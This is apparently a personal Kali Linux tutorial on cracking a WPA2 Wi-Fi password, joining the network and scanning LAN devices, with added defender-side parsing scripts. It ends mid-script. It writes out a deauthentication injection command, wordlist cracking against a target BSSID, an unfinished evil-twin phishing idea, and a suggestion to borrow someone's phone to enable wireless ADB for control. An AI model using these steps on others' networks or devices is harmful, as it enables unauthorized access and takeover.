Overview of the basic workflow: cracking a Wi-Fi password, connecting to the network, and scanning the devices on the LAN
#linux, #kali, #wifi, #pentest, #cracking, #usb-wireless
Plug the USB adapter into the computer, or use the computer's built-in PCI device
On the host, check for the newly added USB device
sudo dmesg | grep -i usb
Output:
[ 414.042120] usb 8-1.4: New USB device found, idVendor=0e8d, idProduct=7961, bcdDevice= 1.00
On the host, check the USB interface
sudo lsusb | grep -i 0e8d:7961
Output:
Bus 008 Device 007: ID 0e8d:7961 MediaTek Inc. Wireless_Device
On the host, check the USB interface in detail
sudo lsusb -s 008:007 -v
Output:
Bus 008 Device 007: ID 0e8d:7961 MediaTek Inc. Wireless_Device
Device Descriptor:
bLength 18
bDescriptorType 1
bcdUSB 3.20
bDeviceClass 0 [unknown]
bDeviceSubClass 0 [unknown]
bDeviceProtocol 0
bMaxPacketSize0 9
idVendor 0x0e8d MediaTek Inc.
idProduct 0x7961 Wireless_Device
bcdDevice 1.00
iManufacturer 2 MediaTek Inc.
iProduct 3 Wireless_Device
iSerial 4 000000000
bNumConfigurations 1
Configuration Descriptor:
bLength 9
bDescriptorType 2
wTotalLength 0x0087
bNumInterfaces 1
bConfigurationValue 1
iConfiguration 5 Config_01
bmAttributes 0xa0
(Bus Powered)
Remote Wakeup
MaxPower 160mA
Interface Descriptor:
bLength 9
bDescriptorType 4
bInterfaceNumber 0
bAlternateSetting 0
bNumEndpoints 9
bInterfaceClass 255 Vendor Specific Class
bInterfaceSubClass 255 Vendor Specific Subclass
bInterfaceProtocol 255 Vendor Specific Protocol
iInterface 1 WiFi_If
Endpoint Descriptor:
bLength 7
bDescriptorType 5
bEndpointAddress 0x84 EP 4 IN
bmAttributes 2
Transfer Type Bulk
Synch Type None
Usage Type Data
wMaxPacketSize 0x0400 1x 1024 bytes
bInterval 0
bMaxBurst 0
Endpoint Descriptor:
bLength 7
bDescriptorType 5
bEndpointAddress 0x85 EP 5 IN
bmAttributes 2
Transfer Type Bulk
Synch Type None
Usage Type Data
wMaxPacketSize 0x0400 1x 1024 bytes
bInterval 0
bMaxBurst 0
Endpoint Descriptor:
bLength 7
bDescriptorType 5
bEndpointAddress 0x08 EP 8 OUT
bmAttributes 2
Transfer Type Bulk
Synch Type None
Usage Type Data
wMaxPacketSize 0x0400 1x 1024 bytes
bInterval 0
bMaxBurst 0
Endpoint Descriptor:
bLength 7
bDescriptorType 5
bEndpointAddress 0x04 EP 4 OUT
bmAttributes 2
Transfer Type Bulk
Synch Type None
Usage Type Data
wMaxPacketSize 0x0400 1x 1024 bytes
bInterval 0
bMaxBurst 0
Endpoint Descriptor:
bLength 7
bDescriptorType 5
bEndpointAddress 0x05 EP 5 OUT
bmAttributes 2
Transfer Type Bulk
Synch Type None
Usage Type Data
wMaxPacketSize 0x0400 1x 1024 bytes
bInterval 0
bMaxBurst 0
Endpoint Descriptor:
bLength 7
bDescriptorType 5
bEndpointAddress 0x06 EP 6 OUT
bmAttributes 2
Transfer Type Bulk
Synch Type None
Usage Type Data
wMaxPacketSize 0x0400 1x 1024 bytes
bInterval 0
bMaxBurst 0
Endpoint Descriptor:
bLength 7
bDescriptorType 5
bEndpointAddress 0x07 EP 7 OUT
bmAttributes 2
Transfer Type Bulk
Synch Type None
Usage Type Data
wMaxPacketSize 0x0400 1x 1024 bytes
bInterval 0
bMaxBurst 0
Endpoint Descriptor:
bLength 7
bDescriptorType 5
bEndpointAddress 0x09 EP 9 OUT
bmAttributes 2
Transfer Type Bulk
Synch Type None
Usage Type Data
wMaxPacketSize 0x0400 1x 1024 bytes
bInterval 0
bMaxBurst 0
Endpoint Descriptor:
bLength 7
bDescriptorType 5
bEndpointAddress 0x86 EP 6 IN
bmAttributes 3
Transfer Type Interrupt
Synch Type None
Usage Type Data
wMaxPacketSize 0x0002 1x 2 bytes
bInterval 1
bMaxBurst 0
Binary Object Store Descriptor:
bLength 5
bDescriptorType 15
wTotalLength 0x0016
bNumDeviceCaps 2
USB 2.0 Extension Device Capability:
bLength 7
bDescriptorType 16
bDevCapabilityType 2
bmAttributes 0x0000f11e
BESL Link Power Management (LPM) Supported
BESL value 256 us
Deep BESL value 61440 us
SuperSpeed USB Device Capability:
bLength 10
bDescriptorType 16
bDevCapabilityType 3
bmAttributes 0x00
wSpeedsSupported 0x000e
Device can operate at Full Speed (12Mbps)
Device can operate at High Speed (480Mbps)
Device can operate at SuperSpeed (5Gbps)
bFunctionalitySupport 1
Lowest fully-functional device speed is Full Speed (12Mbps)
bU1DevExitLat 10 micro seconds
bU2DevExitLat 180 micro seconds
Device Status: 0x0000
(Bus Powered)
On the host, check the built-in PCI interface
sudo lspci | grep -i Wireless
Output:
04:00.0 Network controller: MEDIATEK Corp. MT7922 802.11ax PCI Express Wireless Network Adapter
On the host, view the built-in PCI interface in detail
sudo lspci -s 04:00.0 -v
Output:
04:00.0 Network controller: MEDIATEK Corp. MT7922 802.11ax PCI Express Wireless Network Adapter
Subsystem: MEDIATEK Corp. MT7922 802.11ax PCI Express Wireless Network Adapter
Flags: bus master, fast devsel, latency 0, IRQ 103, IOMMU group 17
Memory at 7ff0300000 (64-bit, prefetchable) [size=1M]
Memory at dc900000 (64-bit, non-prefetchable) [size=32K]
Capabilities: [80] Express Endpoint, MSI 00
Capabilities: [e0] MSI: Enable+ Count=1/32 Maskable+ 64bit+
Capabilities: [f8] Power Management version 3
Capabilities: [100] Vendor Specific Information: ID=1556 Rev=1 Len=008 <?>
Capabilities: [108] Latency Tolerance Reporting
Capabilities: [110] L1 PM Substates
Capabilities: [200] Advanced Error Reporting
Kernel driver in use: mt7921e
Kernel modules: mt7921e
On the host, check the driver information for the built-in PCI interface
sudo lspci -s 04:00.0 -k
Output:
04:00.0 Network controller: MEDIATEK Corp. MT7922 802.11ax PCI Express Wireless Network Adapter
Subsystem: MEDIATEK Corp. MT7922 802.11ax PCI Express Wireless Network Adapter
Kernel driver in use: mt7921e
Kernel modules: mt7921e
On the host, check the WLAN device interface
sudo iw dev
Output:
phy#5
Interface wlx90de80479053
ifindex 63
wdev 0x500000005
addr AA:BB:CC:DD:EE:08
type managed
multicast TXQ:
qsz-byt qsz-pkt flows drops marks overlmt hashcol tx-bytes tx-packets
0 0 0 0 0 0 0 0 0
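As an added example (not code from the original post), the same identification steps done programmatically: the dmesg and lsusb lines above are parsed for the vendor:product ID, and the kernel driver bound to the adapter's interfaces is read from sysfs, so an adapter you did not plug in, or one bound to an unexpected driver, shows up as a single record. The sample dmesg and lsusb text is constructed from the output shown above; the sysfs path is the standard /sys/bus/usb/devices and the lookup simply returns an empty list where it does not exist.

```python
import re
from pathlib import Path

# Constructed sample lines in the same layout as the `dmesg` and `lsusb` output above
SAMPLE_DMESG = """[  414.042120] usb 8-1.4: New USB device found, idVendor=0e8d, idProduct=7961, bcdDevice= 1.00
[  414.042131] usb 8-1.4: New USB device strings: Mfr=2, Product=3, SerialNumber=4
[  414.042135] usb 8-1.4: Product: Wireless_Device
"""
SAMPLE_LSUSB = """Bus 008 Device 007: ID 0e8d:7961 MediaTek Inc. Wireless_Device
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
"""

DMESG_RE = re.compile(
    r"usb (?P<port>[\d.-]+): New USB device found, "
    r"idVendor=(?P<vid>[0-9a-f]{4}), idProduct=(?P<pid>[0-9a-f]{4})")
LSUSB_RE = re.compile(
    r"^Bus (?P<bus>\d{3}) Device (?P<dev>\d{3}): "
    r"ID (?P<vid>[0-9a-f]{4}):(?P<pid>[0-9a-f]{4})\s*(?P<desc>.*)$", re.M)


def usb_ids_from_dmesg(text):
    """Return (bus-port, 'vid:pid') for every 'New USB device found' line."""
    return [(m["port"], f"{m['vid']}:{m['pid']}") for m in DMESG_RE.finditer(text)]


def lsusb_entries(text):
    """Map 'vid:pid' -> (bus, device, description) from `lsusb` output."""
    return {f"{m['vid']}:{m['pid']}": (m["bus"], m["dev"], m["desc"].strip())
            for m in LSUSB_RE.finditer(text)}


def sysfs_drivers(vid_pid, sysfs_root="/sys/bus/usb/devices"):
    """Kernel drivers bound to the interfaces of USB device vid:pid, read from sysfs.
    Returns a sorted list; empty if the device is absent or sysfs is unavailable."""
    vid, pid = vid_pid.split(":")
    root = Path(sysfs_root)
    if not root.is_dir():
        return []
    drivers = set()
    for dev in root.iterdir():
        try:
            if ((dev / "idVendor").read_text().strip() != vid
                    or (dev / "idProduct").read_text().strip() != pid):
                continue
        except OSError:          # interface entries have no idVendor file
            continue
        # Interfaces of device 8-1.4 appear as 8-1.4:1.0, 8-1.4:1.1, ...
        for iface in root.glob(f"{dev.name}:*"):
            drv = iface / "driver"
            if drv.is_symlink():
                drivers.add(drv.resolve().name)   # e.g. mt7921u
    return sorted(drivers)


def inventory(dmesg_text, lsusb_text, sysfs_root="/sys/bus/usb/devices"):
    """Join the three views: one record per device announced in dmesg."""
    seen = lsusb_entries(lsusb_text)
    records = []
    for port, vid_pid in usb_ids_from_dmesg(dmesg_text):
        bus, dev, desc = seen.get(vid_pid, ("?", "?", "not listed by lsusb"))
        records.append({"port": port, "id": vid_pid, "bus": bus, "device": dev,
                        "description": desc,
                        "drivers": sysfs_drivers(vid_pid, sysfs_root)})
    return records


if __name__ == "__main__":
    # On a real host, feed it `dmesg` and `lsusb` output instead of the samples
    for record in inventory(SAMPLE_DMESG, SAMPLE_LSUSB):
        print(record)
```

Run on a live host as `inventory(open("/dev/stdin").read(), subprocess.check_output(["lsusb"]).decode())` after piping `dmesg` in, or just paste the two outputs; the driver list is what tells you whether the adapter ended up on mt7921u (as the airmon-ng output later shows) or was grabbed by something else.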
Create a kali container and bind the host's local USB devices into it
#docker rm -fv kali-rolling
docker run --restart=always --name kali-rolling \
--platform linux/amd64 \
--privileged \
--network host \
-d \
-e DEBIAN_FRONTEND=noninteractive \
-it \
-v /dev/bus/usb:/dev/bus/usb \
docker.io/kalilinux/kali-rolling:latest bash
# Enter the kali container
docker exec -it kali-rolling bash
# Install the Wi-Fi capture tools
apt update
apt install -y aircrack-ng kmod procps usbutils iw wpasupplicant net-tools pciutils locales isc-dhcp-client arp-scan nmap curl
# Confirm the USB interface
lsusb | grep -i 0e8d:7961
Output:
Bus 008 Device 007: ID 0e8d:7961 MediaTek Inc. Wireless_Device
Confirm the PCI interface
lspci | grep -i Wireless
Output:
04:00.0 Network controller: MEDIATEK Corp. MT7922 802.11ax PCI Express Wireless Network Adapter
Confirm the USB device interface
iw dev
Output:
phy#5
Interface wlx90de80479053
ifindex 61
wdev 0x500000003
addr AA:BB:CC:DD:EE:08
type managed
multicast TXQ:
qsz-byt qsz-pkt flows drops marks overlmt hashcol tx-bytes tx-packets
0 0 0 0 0 0 0 0 0
Enable monitor mode on the WLAN device
# Bring up the USB adapter
ip link set wlx90de80479053 up
# Kill interfering services
airmon-ng check kill
# The USB adapter is recognised as wlx90de80479053; once monitor mode is enabled it becomes wlan0mon
airmon-ng start wlx90de80479053
Output:
PHY Interface Driver Chipset
unable to initialize usb specphy5 wlx90de80479053 mt7921u MediaTek Inc. Wireless_Device
Interface wlx90de80479053mon is too long for linux so it will be renamed to the old style (wlan#) name.
(mac80211 monitor mode vif enabled on [phy5]wlan0mon)
(mac80211 station mode vif disabled for [phy5]wlx90de80479053)
Scan all signals
airodump-ng wlan0mon
Output:
CH 14 ][ Elapsed: 6 s ][ 2025-08-20 20:48
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
AA:BB:CC:DD:EE:01 -55 4 0 0 9 130 WPA2 CCMP PSK WIFI1
AA:BB:CC:DD:EE:02 -56 9 0 0 8 130 WPA2 CCMP PSK WIFI2
AA:BB:CC:DD:EE:03 -48 4 0 0 1 270 WPA3 CCMP SAE WIFI3
AA:BB:CC:DD:EE:04 -27 4 0 0 1 270 WPA3 CCMP SAE WIFI4
AA:BB:CC:DD:EE:05 -44 10 0 0 1 270 WPA2 CCMP PSK WIFI5
BSSID STATION PWR Rate Lost Frames Notes Probes
AA:BB:CC:DD:EE:03 AA:BB:CC:DD:EE:06 -55 0 -24e 12 7
AA:BB:CC:DD:EE:04 AA:BB:CC:DD:EE:07 -46 0 - 1e 0 1
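Added example, not code from the original post: a defender-side audit of the airodump-ng AP table above. It parses the rows and rates each network from its ENC / CIPHER / AUTH columns, so the owner of these networks can see at a glance which ones still rely on WPA2-PSK (where, as this post goes on to describe, a captured handshake can be attacked offline with a wordlist) and which already use WPA3-SAE. The sample table is constructed from the output above with an open, a WEP and an 802.1X row added to exercise every branch; the severity labels and notes are my own, and the cipher/auth parsing assumes one token per column as in the output shown.

```python
import re

# Constructed sample in the layout airodump-ng prints: the AP rows from above plus
# three extra rows (open, WEP, 802.1X) to exercise the other rating branches.
SAMPLE = """ CH 14 ][ Elapsed: 6 s ][ 2025-08-20 20:48

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 AA:BB:CC:DD:EE:01  -55        4        0    0   9  130   WPA2 CCMP   PSK  WIFI1
 AA:BB:CC:DD:EE:03  -48        4        0    0   1  270   WPA3 CCMP   SAE  WIFI3
 AA:BB:CC:DD:EE:16  -50        6        0    0  36  270   WPA2 CCMP   MGT  CORP
 AA:BB:CC:DD:EE:14  -60        2        0    0   6   54   OPN              Guest Net
 AA:BB:CC:DD:EE:15  -70        1        0    0  11   54   WEP  WEP         OLD

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 AA:BB:CC:DD:EE:03  AA:BB:CC:DD:EE:06  -55    0 -24e     12        7
"""

MAC = r"(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}"
AP_ROW = re.compile(
    rf"^\s*(?P<bssid>{MAC})\s+(?P<pwr>-?\d+)\s+(?P<beacons>\d+)\s+(?P<data>\d+)\s+"
    rf"(?P<ps>\d+)\s+(?P<ch>-?\d+)\s+(?P<mb>\S+)\s+"
    # ENC may list several tokens in mixed mode, e.g. "WPA2 WPA"
    r"(?P<enc>(?:OPN|WEP|WPA3|WPA2|WPA)(?:\s+WPA\d?(?=\s))*)\s*(?P<rest>.*)$")


def parse_ap_table(text):
    """One dict per access-point row; stops at the station table."""
    aps = []
    for line in text.splitlines():
        if re.match(r"^\s*BSSID\s+STATION", line):
            break
        m = AP_ROW.match(line)
        if not m:
            continue
        encs, rest = m["enc"].split(), m["rest"]
        if encs[0] == "OPN":                      # no CIPHER/AUTH columns
            cipher, auth, essid = "", "", rest
        elif encs[0] == "WEP":                    # CIPHER is "WEP", AUTH usually blank
            parts = rest.split(None, 1)
            cipher = parts[0] if parts else ""
            auth, essid = "", (parts[1] if len(parts) > 1 else "")
        else:
            cipher, auth, essid = (rest.split(None, 2) + ["", "", ""])[:3]
        aps.append({"bssid": m["bssid"].upper(), "channel": int(m["ch"]), "enc": encs,
                    "cipher": cipher, "auth": auth, "essid": essid.strip()})
    return aps


def rate(ap):
    """Defender's rating of what the beacon advertises (labels are my own)."""
    encs, cipher, auth = set(ap["enc"]), ap["cipher"], ap["auth"]
    if "OPN" in encs:
        return "critical", "no encryption: anyone in range can read the traffic"
    if "WEP" in encs:
        return "critical", "WEP is broken; replace or reconfigure the access point"
    if cipher == "TKIP" or encs == {"WPA"}:
        return "high", "WPA1/TKIP is deprecated; move to WPA2-CCMP at least"
    if "WPA3" in encs and auth == "SAE" and "WPA2" not in encs:
        return "ok", "WPA3-SAE: a captured handshake does not allow offline guessing"
    if auth == "MGT":
        return "ok", "802.1X (enterprise) authentication; review the RADIUS/EAP setup separately"
    if "WPA2" in encs:
        return "medium", ("WPA2-PSK: a captured 4-way handshake can be attacked offline with "
                          "a wordlist; use a long random passphrase, enable PMF, plan WPA3")
    return "unknown", "unrecognised combination: " + " ".join(ap["enc"])


def audit_airodump(text):
    """Parsed AP rows with a severity and a one-line note attached to each."""
    return [{**ap, "severity": rate(ap)[0], "note": rate(ap)[1]} for ap in parse_ap_table(text)]


if __name__ == "__main__":
    for f in audit_airodump(SAMPLE):
        print(f"{f['severity']:8} {f['bssid']} ch{f['channel']:<3} {f['essid']!r}: {f['note']}")
```

Feed it the text airodump-ng writes to the terminal (or the `-w` text/CSV output with the same columns) for your own networks; anything rated medium or worse is a configuration to change before worrying about who might be listening.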
Listen only on one channel / one target BSSID
airodump-ng --bssid AA:BB:CC:DD:EE:03 -c 1 wlan0mon
Injection (disconnecting the client) to trigger a handshake: the client re-authenticates and a handshake capture is produced
aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:06 wlan0mon
Offline cracking with a wordlist (e.g. wordlist.txt) / brute-force tools (e.g. aircrack-ng, Hashcat)
aircrack-ng -w wordlist.txt -b AA:BB:CC:DD:EE:03 capture.cap
The USB adapter is renamed to wlan0mon while monitor mode is on; stopping monitor mode restores the name wlx90de80479053
airmon-ng stop wlan0mon
Compared with the dictionary-and-luck approach, an active attack might be attempted instead: create a hotspot with the same name, set up a login page that appears to authenticate, let someone who knows the Wi-Fi password connect and type the real plaintext password, and display the password in the back end
That is no longer luck but a genuine impersonation technique
#TODO, hmm, I don't know how to do it; I'm quite lost on this part. I only have an idea, haven't thought it through and don't know how to do it. Maybe I'll write it later, maybe there is no later
Temporarily connect to the Wi-Fi for testing
Configure the Chinese (zh_CN.UTF-8) locale
sed -i 's;# zh_CN.UTF-8 UTF-8;zh_CN.UTF-8 UTF-8;g' /etc/locale.gen
locale-gen
update-locale LANG=zh_CN.UTF-8
export LANG=zh_CN.UTF-8
export LC_ALL=zh_CN.UTF-8
locale
# Start wpa_supplicant with its control socket
pkill -f wpa_supplicant
rm -frv /var/run/wpa_supplicant ; sleep 3
wpa_supplicant -B -i wlx90de80479053 -C /var/run/wpa_supplicant
# Scan for Wi-Fi networks
wpa_cli -i wlx90de80479053 scan
# Get the scan results
wpa_cli -i wlx90de80479053 scan_results | python3 -c "
import sys
# wpa_cli prints non-ASCII SSID bytes as \xNN escapes; rebuild the raw bytes and decode as UTF-8
for line in sys.stdin:
    line = line.strip()
    b = bytearray()
    i = 0
    while i < len(line):
        if line[i:i+2] == '\\\\x' and i+3 < len(line):
            b.append(int(line[i+2:i+4], 16))
            i += 4
        else:
            b.append(ord(line[i]))
            i += 1
    print(b.decode('utf-8'))
"
Output as follows
bssid / frequency / signal level / flags / ssid
12:76:ec:70:ff:f3 2412 -30 [WPA2-PSK+SAE-CCMP][ESS] 喵喵喵
Alternatively, the results can be obtained this way
iw dev wlx90de80479053 scan | grep 'SSID:' | awk -F'SSID: ' '{print $2}' | python3 -c "
import sys
# iw escapes non-ASCII SSID bytes the same way (\xNN); rebuild the raw bytes and decode as UTF-8
for line in sys.stdin:
    line = line.strip()
    b = bytearray()
    i = 0
    while i < len(line):
        if line[i:i+2] == '\\\\x' and i+3 < len(line):
            b.append(int(line[i+2:i+4], 16))
            i += 4
        else:
            b.append(ord(line[i]))
            i += 1
    print(b.decode('utf-8'))
"
Output as follows
喵喵喵
Generate the configuration (including the Wi-Fi key)
wpa_passphrase "喵喵喵" "12345678" > /etc/wpa_supplicant/wpa_supplicant-wlx90de80479053.conf
Or you can generate a more elaborate configuration
# Convert the Wi-Fi name to its hexadecimal (hex) representation
python3 -c 'print("喵喵喵".encode("utf-8").hex())'
The hexadecimal output is
e596b5e596b5e596b5
Generate the configuration (including the Wi-Fi key)
wpa_passphrase "喵喵喵" "12345678" > /etc/wpa_supplicant/wpa_supplicant-wlx90de80479053.conf
# Replace the Wi-Fi name with its hex form and check the result
sed -i 's;"喵喵喵";e596b5e596b5e596b5;g' /etc/wpa_supplicant/wpa_supplicant-wlx90de80479053.conf
cat /etc/wpa_supplicant/wpa_supplicant-wlx90de80479053.conf
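Added example that is not code from the post: the two inline \xNN decoders above and the hex/sed steps, as reusable Python functions. decode_wpa_escapes also copes with an incomplete or non-hex escape (which the inline version would raise on), with characters above U+00FF, and with the other escapes wpa_supplicant's printf_encode emits (\n, \r, \t, \e, \\, \"), which I am assuming follow that convention. wpa_psk derives the key the way wpa_passphrase does (PBKDF2-HMAC-SHA1, 4096 iterations, 32 bytes, the SSID bytes as salt), so network_block writes the hex SSID and the derived PSK straight into a network block, without the sed replacement and without the #psk="..." plaintext comment that wpa_passphrase leaves in the file. The scan_results sample is constructed from the output above.

```python
import hashlib
import re

# Constructed sample in the tab-separated layout of `wpa_cli scan_results`; the SSID
# column carries the \xNN escapes wpa_cli uses for non-ASCII bytes (UTF-8 of 喵喵喵).
SCAN_SAMPLE = (
    "bssid / frequency / signal level / flags / ssid\n"
    "12:76:ec:70:ff:f3\t2412\t-30\t[WPA2-PSK+SAE-CCMP][ESS]\t"
    "\\xe5\\x96\\xb5\\xe5\\x96\\xb5\\xe5\\x96\\xb5\n"
    "aa:bb:cc:dd:ee:03\t5180\t-48\t[WPA2-SAE-CCMP][ESS]\tWIFI3\n"
)

# Single-character escapes printf_encode uses besides \xNN (assumed convention)
SIMPLE_ESCAPES = {"n": "\n", "r": "\r", "t": "\t", "e": "\x1b", "\\": "\\", '"': '"'}


def decode_wpa_escapes(s, errors="replace"):
    """Undo wpa_cli/iw escaping of an SSID and decode the bytes as UTF-8."""
    out = bytearray()
    i = 0
    while i < len(s):
        if s[i:i + 2] == "\\x" and i + 4 <= len(s):
            try:
                out.append(int(s[i + 2:i + 4], 16))
                i += 4
                continue
            except ValueError:          # "\x" not followed by two hex digits: keep literally
                pass
        if s[i] == "\\" and i + 1 < len(s) and s[i + 1] in SIMPLE_ESCAPES:
            out.extend(SIMPLE_ESCAPES[s[i + 1]].encode("utf-8"))
            i += 2
            continue
        out.extend(s[i].encode("utf-8"))    # ord() would break for chars above U+00FF
        i += 1
    return out.decode("utf-8", errors)


def parse_scan_results(text):
    """Rows of `wpa_cli scan_results` as dicts; the header line is skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split("\t")
        if len(parts) < 5 or not re.fullmatch(r"-?\d+", parts[1]):
            continue
        bssid, freq, signal, flags = parts[:4]
        rows.append({"bssid": bssid, "freq": int(freq), "signal": int(signal),
                     "flags": flags, "ssid": decode_wpa_escapes(parts[4]),
                     "sae": "SAE" in flags})      # WPA3-SAE offered by this BSS
    return rows


def ssid_hex(ssid):
    """SSID as the unquoted hex form wpa_supplicant accepts in ssid=..."""
    return ssid.encode("utf-8").hex()


def wpa_psk(ssid, passphrase):
    """Same derivation wpa_passphrase performs (IEEE 802.11i PBKDF2-HMAC-SHA1)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8..63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32).hex()


def network_block(ssid, passphrase):
    """network={} block with hex SSID and derived PSK; the plaintext passphrase is not written."""
    return "network={\n\tssid=%s\n\tpsk=%s\n}\n" % (ssid_hex(ssid), wpa_psk(ssid, passphrase))


if __name__ == "__main__":
    for row in parse_scan_results(SCAN_SAMPLE):
        print(row)
    print(network_block("喵喵喵", "12345678"), end="")
```

Append the block to /etc/wpa_supplicant/wpa_supplicant-wlx90de80479053.conf instead of the wpa_passphrase output; it connects exactly the same way, and the file no longer holds the passphrase in clear (the 32-byte PSK still has to be protected, since it is what the 4-way handshake is keyed from).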
# Start wpa_supplicant (for testing; -B puts it in the background)
pkill -f wpa_supplicant
rm -frv /var/run/wpa_supplicant ; sleep 3
wpa_supplicant -i wlx90de80479053 -c /etc/wpa_supplicant/wpa_supplicant-wlx90de80479053.conf -D nl80211 -B -C /var/run/wpa_supplicant
# Check the connection status
wpa_cli -i wlx90de80479053 -p /var/run/wpa_supplicant status
Output:
bssid=AA:BB:CC:DD:EE:09
freq=5805
ssid=喵喵喵
id=0
mode=station
wifi_generation=6
pairwise_cipher=CCMP
group_cipher=CCMP
key_mgmt=WPA2-PSK
wpa_state=COMPLETED
p2p_device_address=AA:BB:CC:DD:EE:08
address=AA:BB:CC:DD:EE:08
uuid=9d955c2b-90ed-50c1-bf63-3f71e06d5bdd
ieee80211ac=1
Or check the connection status this way
iw dev wlx90de80479053 link
Output:
Connected to AA:BB:CC:DD:EE:09 (on wlx90de80479053)
SSID: 喵喵喵
freq: 5805.0
RX: 4240 bytes (32 packets)
TX: 797 bytes (7 packets)
signal: -68 dBm
rx bitrate: 24.0 MBit/s
tx bitrate: 720.6 MBit/s 80MHz HE-MCS 7 HE-NSS 2 HE-GI 0 HE-DCM 0
bss flags: short-slot-time
dtim period: 2
beacon int: 100
Automatically obtain / refresh the interface's DHCP lease
dhclient -v wlx90de80479053
Or, if you are more capable and know the LAN layout in detail, you can hand-craft the address configuration yourself; if not, just obtain it via DHCP like everyone else
For example, if you have already probed the LAN as 192.168.31.0/24, the configuration is as follows
ip addr del 192.168.31.2/24 dev wlx90de80479053
ip route del default via 192.168.31.1 dev wlx90de80479053
ip addr add 192.168.31.2/24 dev wlx90de80479053
ip route add default via 192.168.31.1 dev wlx90de80479053
Scan the LAN for device IPs on the specified interface
arp-scan -I wlx90de80479053 192.168.31.0/24
Output as follows
Interface: wlx90de80479053, type: EN10MB, MAC: AA:BB:CC:DD:EE:08, IPv4: 192.168.31.2
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1 AA:BB:CC:DD:EE:10 (Unknown)
192.168.31.95 AA:BB:CC:DD:EE:11 (Unknown)
192.168.31.147 AA:BB:CC:DD:EE:12 (Unknown)
192.168.31.165 AA:BB:CC:DD:EE:13 Beijing Xiaomi Mobile Software Co., Ltd
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.898 seconds (134.88 hosts/sec). 4 responded
Or scan for live device IPs on the specified interface
nmap -sn -e wlx90de80479053 192.168.31.0/24
Output as follows
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-21 05:56 UTC
Nmap scan report for 192.168.31.1
Host is up (0.0011s latency).
MAC Address: AA:BB:CC:DD:EE:10 (Unknown)
Nmap scan report for 192.168.31.95
Host is up (0.11s latency).
MAC Address: AA:BB:CC:DD:EE:11 (Unknown)
Nmap scan report for 192.168.31.147
Host is up (0.19s latency).
MAC Address: AA:BB:CC:DD:EE:12 (Unknown)
Nmap scan report for 192.168.31.165
Host is up (0.0083s latency).
MAC Address: AA:BB:CC:DD:EE:13 (Beijing Xiaomi Mobile Software)
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.96 seconds
Check which ports/services a particular device has open. Of course, these are ports open on my own phone; an Android device with port 5555 open is a security risk, and it is recommended to enable it only on trusted networks.
According to the scan results, 192.168.31.147 is an Android device with port 5555 open, running the ADB service (token authentication is required to connect)
-O tries to identify the operating system, -sV probes service versions
Of course that is the whole point of social engineering: you know the person and you know their device, so you can say: "May I borrow your phone for a moment?", then enable wireless ADB authorization, and you most likely have control of the phone.
nmap -sV -p 1-65535 -e wlx90de80479053 192.168.31.147
Output as follows
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-21 06:03 UTC
Nmap scan report for 192.168.31.147
Host is up (0.012s latency).
Not shown: 9998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
5555/tcp open adb Android Debug Bridge (token auth required)
MAC Address: AA:BB:CC:DD:EE:12 (Unknown)
Service Info: OS: Android; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.03 seconds
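Added example (not from the post): turning the arp-scan and nmap output above into a small LAN audit for the network's owner. It compares the MACs arp-scan found with an allowlist the owner maintains (the KNOWN_DEVICES map is a constructed assumption), and flags open services that should not be reachable over Wi-Fi, such as the ADB port 5555 the scan found on the phone. The arp-scan and nmap samples are constructed from the outputs above, with one extra host carrying telnet so a second finding appears.

```python
import re

# Constructed allowlist: what the network owner expects to see on the LAN (MAC -> label).
KNOWN_DEVICES = {
    "AA:BB:CC:DD:EE:10": "home router",
    "AA:BB:CC:DD:EE:12": "my Android phone",
}

# Constructed samples in the layout arp-scan and `nmap -sV` print (based on the runs above).
ARP_SAMPLE = """Interface: wlx90de80479053, type: EN10MB, MAC: AA:BB:CC:DD:EE:08, IPv4: 192.168.31.2
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1\tAA:BB:CC:DD:EE:10\t(Unknown)
192.168.31.95\tAA:BB:CC:DD:EE:11\t(Unknown)
192.168.31.147\tAA:BB:CC:DD:EE:12\t(Unknown)
192.168.31.165\tAA:BB:CC:DD:EE:13\tBeijing Xiaomi Mobile Software Co., Ltd

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.898 seconds (134.88 hosts/sec). 4 responded
"""
NMAP_SAMPLE = """Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-21 06:03 UTC
Nmap scan report for 192.168.31.147
Host is up (0.012s latency).
Not shown: 9998 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge (token auth required)
MAC Address: AA:BB:CC:DD:EE:12 (Unknown)
Nmap scan report for router.lan (192.168.31.1)
Host is up (0.0011s latency).
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9
23/tcp   open  telnet  BusyBox telnetd
"""

ARP_ROW = re.compile(r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+"
                     r"(?P<mac>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})\s*(?P<vendor>.*)$")
NMAP_HOST = re.compile(r"^Nmap scan report for (?:(?P<name>\S+) \((?P<ip1>[\d.]+)\)|(?P<ip2>[\d.]+))")
NMAP_PORT = re.compile(r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$")

# Service name as nmap reports it -> why it matters when exposed on a Wi-Fi LAN (my notes)
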